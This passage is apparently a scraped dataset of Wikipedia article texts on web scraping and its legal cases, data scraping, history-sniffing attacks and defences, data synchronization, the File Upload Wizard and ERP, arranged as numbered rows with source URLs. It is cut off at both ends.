active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
234 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
235 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/History_sniffing | History sniffing is a class of web vulnerabilities and attacks that allow a website to track a user's web browsing history activities by recording which websites a user has visited and which the user has not. This is done by leveraging long-standing information leakage issues inherent to the design of the web platform, one of the most well-known of which includes detecting CSS attribute changes in links that the user has already visited. Despite being known about since 2002, history sniffing is still considered an unsolved problem. In 2010, researchers revealed that multiple high-profile websites had used history sniffing to identify and track users. Shortly afterwards, Mozilla and all other major web browsers implemented defences against history sniffing. However, recent research has shown that these mitigations are ineffective against specific variants of the attack and history sniffing can still occur via visited links and newer browser features. Early browsers such as Mosaic and Netscape Navigator were built on the model of the web being a set of statically linked documents known as pages. In this model, it made sense for the user to know which documents they had previously visited and which they hadn't, regardless of which document was referring to them. 1 Mosaic, one of the earliest graphical web browsers, used purple links to show that a page had been visited and blue links to show pages that had not been visited. 2 3 This paradigm stuck around and was subsequently adopted by all modern web browsers. 4 Over the years, the web evolved from its original model of static content towards more dynamic content. In 1995, employees at Netscape added a scripting language, Javascript, to its flagship web browser, Netscape Navigator. This addition allowed users to add interactivity to the web page via executing Javascript programs as part of the rendering process. 5 6 However, this addition came with a new security problem, that of these Javascript programs being able to access each other's execution context and sensitive information about the user. As a result, shortly afterwards, Netscape Navigator introduced the same-origin policy. This security measure prevented Javascript from being able to arbitrarily access data in a different web page's execution context. 7 However, while the same-origin policy was subsequently extended to cover a large variety of features introduced before its existence, it was never extended to cover hyperlinks since it was perceived to hurt the user's ability to browse the web. 4 This innocuous omission would manifest into one of the well known and earliest forms of history sniffing known on the web. 8 One of the first publicly disclosed reports of a history sniffing exploit was made by Andrew Clover from Purdue University in a mailing list post on BUGTRAQ in 2002. The post detailed how a malicious website could use Javascript to determine if a given link was of a specific colour, thus revealing if the link had been previously visited. 9 While this was initially thought of to be a theoretical exploit with little real-world value, later research by Jang et al. in 2010 revealed that high-profile websites were using this technique in the wild to reveal user browsing data. 10 As a result multiple lawsuits were filed against the websites that were found to have used history sniffing alleging a violation of the Computer Fraud and Abuse Act of 1986. 8 In the same year, L. David Baron from Mozilla Corporation developed a defence against the attack that all major browsers would later adopt. The defence included restrictions against what kinds of CSS attributes could be used to style visited links. The ability to add background images and CSS transitions to links was disallowed. Additionally, visited links would be treated identically to standard links, with Javascript application programming interfaces (APIs) that allow the website to query the color of specific elements returning the same attributes for a visited link as those for non-visited links. This ensured malicious websites could not simply infer a person's browsing history by querying the colour changes. 11 In 2011, research by then-Stanford graduate student Jonathan Mayer found that advertising company Epic Marketplace Inc. had used history sniffing to collect information about the browsing history of users across the web. 12 13 A subsequent investigation by the Federal Trade Commission (FTC) revealed that Epic Marketplace had used history sniffing code as a part of advertisements in over 24,000 web domains, including ESPN and Papa Johns. The Javascript code allowed Epic Marketplace to track if a user has visited any of over 54,000 domains. 14 15 The resulting data was subsequently used by Epic Marketplace to categorize users into specific groups and serve advertisements based on the websites the user had visited. As a result of this investigation, the FTC banned Epic Marketplace Inc. from conducting any form of online advertising and marketing for twenty years and was ordered to permanently delete the data it had collected. 16 15 The threat model of history sniffing relies on the adversary being able to direct the victim to a malicious website entirely or partially under the adversary's control. The adversary can accomplish this by compromising a previously good web page, by phishing the user to a web page allowing the adversary to load arbitrary code, or by using a malicious advertisement on an otherwise safe web page. 8 17 While most history sniffing attacks do not require user interactions, specific variants of the attacks need users to interact with particular elements which can often be disguised as buttons, browser games, CAPTCHAs, and other such elements. 4 Despite being partially mitigated in 2010, history sniffing is still considered an unsolved problem. 8 In 2011, researchers at Carnegie Mellon University showed that while the defences proposed by Mozilla were sufficient to prevent most non-interactive attacks, such as those found by Jang et al., they were ineffective against interactive attacks. By showing users overlaid letters, numbers and patterns, which would only reveal themselves if a user had visited a specific website, the researchers were able to trick 307 participants into potentially revealing their browsing history via history sniffing. This was done by presenting the activities in the form of pattern solving problems, chess games and CAPTCHAs. 18 4 In 2018, researchers at the University of California, San Diego demonstrated timing attacks that could bypass the mitigations introduced by Mozilla. By abusing the CSS paint API (which allows developers to draw a background image programmatically) and targeting the bytecode cache of the browser, the researchers were able to time the amount of time it took to paint specific links. Thus, they were able to provide probabilistic techniques for identifying visited websites. 19 20 Since 2019, multiple history sniffing attacks have been found targeting various newer features browsers provide. In 2020, Sanchez-Rola et al. demonstrated that by measuring the time a server takes to respond to a request with HTTP cookies and then comparing it to how long it took for a server to respond without cookies, a website could perform history sniffing. 21 In 2023, Ali et al. demonstrated that newly introduced browser features could be abused also to perform history sniffing. One particularly notable example highlighted was the fact that a recently introduced feature, the Private Tokens API, introduced under Google's Privacy Sandbox initiative with an intention to prevent user tracking, could allow malicious actors to exfiltrate users browsing data by using techniques similar to those used for cross-site leak attacks. 22 |
236 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_synchronization | Data synchronization is the process of establishing consistency between source and target data stores, and the continuous harmonization of the data over time. It is fundamental to a wide variety of applications, including file synchronization and mobile device synchronization. Data synchronization can also be useful in encryption for synchronizing public key servers. Data synchronization is needed to update and keep multiple copies of a set of data coherent with one another or to maintain data integrity, Figure 3. 1 For example, database replication is used to keep multiple copies of data synchronized with database servers that store data in different locations. Examples include: Some of the challenges which user may face in data synchronization: Data formats tend to grow more complex with time as the organization grows and evolves. This results not only in building simple interfaces between the two applications (source and target), but also in a need to transform the data while passing them to the target application. ETL (extraction transformation loading) tools can be helpful at this stage for managing data format complexities. In real-time systems, customers want to see the current status of their order in e-shop, the current status of a parcel delivery—a real time parcel tracking—, the current balance on their account, etc. This shows the need of a real-time system, which is being updated as well to enable smooth manufacturing process in real-time, e.g., ordering material when enterprise is running out stock, synchronizing customer orders with manufacturing process, etc. From real life, there exist so many examples where real-time processing gives successful and competitive advantage. There are no fixed rules and policies to enforce data security. It may vary depending on the system which you are using. Even though the security is maintained correctly in the source system which captures the data, the security and information access privileges must be enforced on the target systems as well to prevent any potential misuse of the information. This is a serious issue and particularly when it comes for handling secret, confidential and personal information. So because of the sensitivity and confidentiality, data transfer and all in-between information must be encrypted. Data quality is another serious constraint. For better management and to maintain good quality of data, the common practice is to store the data at one location and share with different people and different systems and or applications from different locations. It helps in preventing inconsistencies in the data. There are five different phases involved in the data synchronization process: Each of these steps is critical. In case of large amounts of data, the synchronization process needs to be carefully planned and executed to avoid any negative impact on performance. There are tools available for file synchronization, version control (CVS, Subversion, etc.), distributed filesystems (Coda, etc.), and mirroring (rsync, etc.), in that all these attempt to keep sets of files synchronized. However, only version control and file synchronization tools can deal with modifications to more than one copy of the files. Several theoretical models of data synchronization exist in the research literature, and the problem is also related to the problem of Slepian Wolf coding in information theory. The models are classified based on how they consider the data to be synchronized. The problem of synchronizing unordered data (also known as the set reconciliation problem) is modeled as an attempt to compute the symmetric difference S A S B ( S A S B ) ( S B S A ) displaystyle S A oplus S B (S A S B ) cup (S B S A ) between two remote sets S A displaystyle S A and S B displaystyle S B of b-bit numbers. 3 Some solutions to this problem are typified by: In this case, two remote strings A displaystyle sigma A and B displaystyle sigma B need to be reconciled. Typically, it is assumed that these strings differ by up to a fixed number of edits (i.e. character insertions, deletions, or modifications). Then data synchronization is the process of reducing edit distance between A displaystyle sigma A and B displaystyle sigma B , up to the ideal distance of zero. This is applied in all filesystem based synchronizations (where the data is ordered). Many practical applications of this are discussed or referenced above. It is sometimes possible to transform the problem to one of unordered data through a process known as shingling (splitting the strings into shingles clarification needed ). 7 In fault-tolerant systems, distributed databases must be able to cope with the loss or corruption of (part of) their data. The first step is usually replication, which involves making multiple copies of the data and keeping them all up to date as changes are made. However, it is then necessary to decide which copy to rely on when loss or corruption of an instance occurs. The simplest approach is to have a single master instance that is the sole source of truth. Changes to it are replicated to other instances, and one of those instances becomes the new master when the old master fails. Paxos and Raft are more complex protocols that exist to solve problems with transient effects during failover, such as two instances thinking they are the master at the same time. Secret sharing is useful if failures of whole nodes are very common. This moves synchronization from an explicit recovery process to being part of each read, where a read of some data requires retrieving encoded data from several different nodes. If corrupt or out-of-date data may be present on some nodes, this approach may also benefit from the use of an error correction code. DHTs and Blockchains try to solve the problem of synchronization between many nodes (hundreds to billions). |
237 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:File_Upload_Wizard | Thank you for offering to contribute an image or other media file for use on Wikipedia. This wizard will guide you through a questionnaire prompting you for the appropriate copyright and sourcing information for each file. Please ensure you understand copyright and the image use policy before proceeding. Uploads to Wikimedia Commons Upload a non-free file Uploads locally to the English Wikipedia; must comply with the non-free content criteria You do not have JavaScript enabled Sorry, in order to use this uploading script, JavaScript must be enabled. You can still use the plain Special:Upload page to upload files to the English Wikipedia without JavaScript. You are not currently logged in. Sorry, in order to use this uploading script and to upload files, you need to be logged in with your named account. Please log in and then try again. Your account has not become confirmed yet. Sorry, in order to upload files on the English Wikipedia, you need to have a confirmed account. Normally, your account will become confirmed automatically once you have made 10 edits and four days have passed since you created it. You may already be able to upload files on the Wikimedia Commons, but you can't do it on the English Wikipedia just yet. If the file you want to upload has a free license, please go to Commons and upload it there. Important note: if you don't want to wait until you are autoconfirmed, you may ask somebody else to upload a file for you at Wikipedia:Files for upload. In very rare cases an administrator may make your account confirmed manually through a request at Wikipedia:Requests for permissions Confirmed. Sorry, a few special characters and character combinations cannot be used in the filename for technical reasons. This goes especially for : and . Your filename has been modified to avoid these. Please check if it is okay now. The filename you chose seems to be very short, or overly generic. Please don't use: A file of this name already exists on Commons If you upload your file with this name, you will be masking the existing file and make it inaccessible. Your new file will be displayed everywhere the existing file was previously used. This should not be done, except in very rare exceptional cases. Please don't upload your file under this name, unless you seriously know what you are doing. Choose a different name for your new file instead. A file of this name already exists. If you upload your file with this name, you will be overwriting the existing file. Your new file will be displayed everywhere the existing file was previously used. Please don't do this, unless you have a good reason to: It is very important that you read through the following options and questions, and provide all required information truthfully and carefully. Thank you for offering to upload a free work. Wikipedia loves free files. However, we would love it even more if you uploaded them on our sister project, the Wikimedia Commons. Files uploaded on Commons can be used immediately here on Wikipedia as well as on all its sister projects. Uploading files on Commons works just the same as here. Your Wikipedia account will automatically work on Commons too. Please consider uploading your file on Commons. However, if you prefer to do it here instead, you may go ahead with this form. You can also first use this form to collect the information about your file and then send it to Commons from here. Please note that by "entirely self-made" we really mean just that. Do not use this section for any of the following: Editors who falsely declare such items as their "own work" will be blocked from editing. Use this only if there is an explicit licensing statement in the source. The website must explicitly say that the image is released under a license that allows free re-use for any purpose, e.g. the Creative Commons Attribution license. You must be able to point exactly to where it says this. If the source website doesn't say so explicitly, please do not upload the file. Public Domain means that nobody owns any copyrights on this work. It does not mean simply that it is freely viewable somewhere on the web or that it has been widely used by others. This is not for images you simply found somewhere on the web. Most images on the web are under copyright and belong to somebody, even if you believe the owner won't care about that copyright. If it is in the public domain, you must be able to point to an actual law that makes it so. If you can't point to such a law but merely found this image somewhere, then please do not upload it. Please remember that you will need to demonstrate that: This file will be used in the following article: Enter the name of exactly one Wikipedia article, without the ... brackets and without the "http: en.wikipedia.org ... URL code. It has to be an actual article, not a talkpage, template, user page, etc. If you plan to use the file in more than one article, please name only one of them here. Then, after uploading, open the image description page for editing and add your separate explanations for each additional article manually. Example article okay. This article doesn't exist The article Example could not be found. Please check the spelling, and make sure you enter the name of an existing article in which you will include this file. If this is an article you are only planning to write, please write it first and upload the file afterwards. This is not an actual encyclopedia article The page Example is not in the main article namespace. Non-free files can only be used in mainspace article pages, not on a user page, talk page, template, etc. Please upload this file only if it is going to be used in an actual article. If this page is an article draft in your user space, we're sorry, but we must ask you to wait until the page is ready and has been moved into mainspace, and only upload the file after that. This is a disambiguation page The page Example is not a real article, but a disambiguation page pointing to a number of other pages. Please check and enter the exact title of the actual target article you meant. If neither of these two statements applies, then please do not upload this image. This section is not for images used merely to illustrate an article about a person or thing, showing what that person or thing look like. In view of this, please explain how the use of this file will be minimal. Well, we're very sorry, but if you're not sure about this file's copyright status, or if it doesn't fit into any of the groups above, then: Please don't upload it. Really, please don't. Even if you think it would make for a great addition to an article. We really take these copyright rules very seriously on Wikipedia. Note that media is assumed to be fully-copyrighted unless shown otherwise; the burden is on the uploader. In particular, please don't upload: If you are in any doubt, please ask some experienced editors for advice before uploading. People will be happy to assist you at Wikipedia:Media copyright questions. Thank you. This is the data that will be submitted to upload: Your file is being uploaded. This might take a minute or two, depending on the size of the file and the speed of your internet connection. Once uploading is completed, you will find your new file at this link: File:Example.jpg Your file has been uploaded successfully and can now be found here: File:Example.jpg Please follow the link and check that the image description page has all the information you meant to include. If you want to change the description, just go to the image page, click the "edit" tab at the top of the page and edit just as you would edit any other page. Do not go through this upload form again, unless you want to replace the actual file with a new version. To insert this file into an article, you may want to use code similar to the following: If you wish to make a link to the file in text, without actually showing the image, for instance when discussing the image on a talk page, you can use the following (mark the : after the initial brackets ): See Wikipedia:Picture tutorial for more detailed help on how to insert and position images in pages. Thank you for using the File Upload Wizard.Please leave your feedback, comments, bug reports or suggestions on the talk page. |
238 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Enterprise_resource_planning | Enterprise resource planning (ERP) is the integrated management of main business processes, often in real time and mediated by software and technology. ERP is usually referred to as a category of business management software—typically a suite of integrated applications—that an organization can use to collect, store, manage and interpret data from many business activities. ERP systems can be local-based or cloud-based. Cloud-based applications have grown in recent years due to the increased efficiencies arising from information being readily available from any location with Internet access. ERP provides an integrated and continuously updated view of the core business processes using common databases maintained by a database management system. ERP systems track business resources—cash, raw materials, production capacity—and the status of business commitments: orders, purchase orders, and payroll. The applications that make up the system share data across various departments (manufacturing, purchasing, sales, accounting, etc.) that provide the data. 1 ERP facilitates information flow between all business functions and manages connections to outside stakeholders. 2 According to Gartner, the global ERP market size is estimated at $35 billion in 2021. 3 4 Though early ERP systems focused on large enterprises, smaller enterprises increasingly use ERP systems. 5 The ERP system integrates varied organizational systems and facilitates error-free transactions and production, thereby enhancing the organization's efficiency. However, developing an ERP system differs from traditional system development. 6 ERP systems run on a variety of computer hardware and network configurations, typically using a database as an information repository. 7 The Gartner Group first used the acronym ERP in the 1990s 8 9 to include the capabilities of material requirements planning (MRP), and the later manufacturing resource planning (MRP II), 10 11 as well as computer-integrated manufacturing. Without replacing these terms, ERP came to represent a larger whole that reflected the evolution of application integration beyond manufacturing. 12 Not all ERP packages are developed from a manufacturing core; ERP vendors variously began assembling their packages with finance-and-accounting, maintenance, and human-resource components. By the mid 1990s ERP systems addressed all core enterprise functions. Governments and non profit organizations also began to use ERP systems. 13 An "ERP system selection methodology" is a formal process for selecting an enterprise resource planning (ERP) system. Existing methodologies include: Kuiper's funnel method, Dobrin's three-dimensional (3D) web-based decision support tool, and the Clarkston Potomac methodology. 14 ERP systems experienced rapid growth in the 1990s. Because of the year 2000 problem many companies took the opportunity to replace their old systems with ERP. 15 ERP systems initially focused on automating back office functions that did not directly affect customers and the public. Front office functions, such as customer relationship management (CRM), dealt directly with customers, or e-business systems such as e-commerce and e-government—or supplier relationship management (SRM) became integrated later, when the internet simplified communicating with external parties. 16 "ERP II" was coined in 2000 in an article by Gartner Publications entitled ERP Is Dead—Long Live ERP II. 17 18 It describes web based software that provides real time access to ERP systems to employees and partners (such as suppliers and customers). The ERP II role expands traditional ERP resource optimization and transaction processing. Rather than just manage buying, selling, etc.—ERP II leverages information in the resources under its management to help the enterprise collaborate with other enterprises. 19 ERP II is more flexible than the first generation ERP. Rather than confine ERP 